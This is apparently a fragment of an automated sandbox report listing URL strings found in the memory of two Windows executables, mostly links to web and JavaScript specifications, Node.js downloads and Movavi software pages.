Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#dfn-class-string
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#dfn-default-iterator-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#dfn-iterator-prototype-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-interfaces
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-iterable
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-iterable-entries
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-iterators
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-namespaces
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-operations
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://heycam.github.io/webidl/#es-stringifier
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#ascii-serialisation-of-an-origin
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://html.spec.whatwg.org/multipage/browsers.html#concept-origin-opaque
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setinterval
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://html.spec.whatwg.org/multipage/webappapis.html#windoworworkerglobalscope
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://invisible-island.net/ncurses/terminfo.ti.html#toc-_Specials
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://invisible-island.net/xterm/ctlseqs/ctlseqs.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://jimmy.warting.se/opensource
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://linux.die.net/man/1/dircolors).
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://mathiasbynens.be/notes/javascript-encoding
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr String found in binary or memory: https://movavi.com0/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://no-color.org/
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://nodejs.org/
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://nodejs.org/api/cli.html#cli_unhandled_rejections_mode).
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://nodejs.org/api/fs.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0-headers.tar.gz
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0.tar.gz
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://nodejs.org/download/release/v16.16.0/node-v16.16.0.tar.gzhttps://nodejs.org/download/release
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://nodejs.org/download/release/v16.16.0/win-x64/node.lib
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://rogueamoeba.com/licensing.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://rogueamoeba.com/licensing/
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://rogueamoeba.com/licensing/.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://sourcemaps.info/spec.html
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://stackoverflow.com/a/5501711/3561
Source: motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2598521100.000002144CEB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.movavi.com/resources/webinstaller/release/movavi/vs/vs_win_x64/resources/config.ini
Source: motor1.exe, 00000015.00000002.2598521100.000002144CEB9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.movavi.com/resources/webinstaller/release/movavi/vs/vs_win_x64/resources/config.ini4
Source: motor1.exe, 00000004.00000003.2451740824.0000022D5F540000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://static.movavi.com/resources/webinstaller/release/movavi/vs/vs_win_x64/resources/config.init1
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tc39.es/ecma262/#sec-%typedarray%-intrinsic-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tc39.es/proposal-iterator-helpers/#sec-iteratorprototype.some
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-%iteratorprototype%-object
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-%typedarray%.of
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-object.prototype.tostring
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2397#section-2
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc3492#section-3.4
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.2.2
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc6455#section-1.3
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.2
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7230#section-3.2.6
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc7540#section-8.1.2.5
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#url
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#url-serializing
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://v8.dev/blog/v8-release-89
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr String found in binary or memory: https://webuid.movavi.com/api/v1/uid
Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr String found in binary or memory: https://webuid.movavi.com/api/v1/uid:
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-timeclip
Source: pKxhpP0spW.exe, 00000001.00000003.2375091391.000002A82B4F9000.00000004.00000020.00020000.00000000.sdmp, pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Alternative
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Atom
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClass
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-CharacterClassEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtom
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassAtomNoDash
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ClassRanges
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-ControlLetter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalDigits
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-DecimalEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Disjunction
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Hex4Digits
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigit
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexDigits
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-HexEscapeSequence
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRanges
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-NonemptyClassRangesNoDash
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-OctalDigit
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Pattern
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-PatternCharacter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-Quantifier
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-QuantifierPrefix
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-RegExpUnicodeEscapeSequence
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-SyntaxCharacter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Assertion
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-AtomEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-CharacterEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassControlLetter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ClassEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedAtom
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-ExtendedPatternCharacter
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-IdentityEscape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-InvalidBracedQuantifier
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-LegacyOctalEscapeSequence
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#prod-annexB-Term
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-atomescape
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.ecma-international.org/ecma-262/8.0/#sec-term
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/.
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/eula-general.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/eula.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/fr/privacy.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/fr/privacy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/fr/refund-policy.html)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/fr/refund-policy.html).
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/fr/support/).
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/it/privacy.html)
Source: motor1.exe, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp String found in binary or memory: https://www.movavi.com/it/privacy.html).
